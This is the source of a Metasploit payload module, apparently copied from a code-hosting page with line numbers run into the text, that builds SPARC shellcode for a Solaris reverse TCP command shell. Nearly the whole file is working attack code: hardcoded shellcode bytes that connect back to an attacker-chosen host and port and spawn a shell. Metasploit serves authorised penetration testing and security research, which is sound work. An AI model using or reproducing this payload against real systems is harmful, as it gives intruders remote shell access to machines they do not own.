Path: blob/master/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
24763 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 14478include Msf::Payload::Single9include Msf::Payload::Solaris10include Msf::Sessions::CommandShellOptions1112def initialize(info = {})13super(14merge_info(15info,16'Name' => 'Solaris Command Shell, Reverse TCP Inline',17'Description' => 'Connect back to attacker and spawn a command shell',18'Author' => 'vlad902',19'License' => MSF_LICENSE,20'Platform' => 'solaris',21'Arch' => ARCH_SPARC,22'Handler' => Msf::Handler::ReverseTcp,23'Session' => Msf::Sessions::CommandShell24)25)26end2728def generate(_opts = {})29port = (datastore['LPORT'] || '0').to_i30host = nil31begin32host = Rex::Socket.resolv_nbo_i(datastore['LHOST'] || '127.0.0.1')33rescue SocketError34host = Rex::Socket.resolv_nbo_i('127.0.0.1')35end3637"\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b" \38"\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08" \39"\xd0\x23\xbf\xf8\x94\x10\x20\x03\x92\x10\x20\x09\x94\xa2\xa0\x01" \40"\x82\x10\x20\x3e\x91\xd0\x20\x08\x12\xbf\xff\xfc\xd0\x03\xbf\xf8" +41Rex::Arch::Sparc.set(0x20000 | port, 'l0') +42Rex::Arch::Sparc.set(host, 'l1') +43"\xe0\x3b\xbf\xf0\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xeb" \44"\x91\xd0\x20\x08\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a\xa0\x14\x21\x6e" \45"\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\xe0\x3b\xbf\xf0" \46"\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"47end48end495051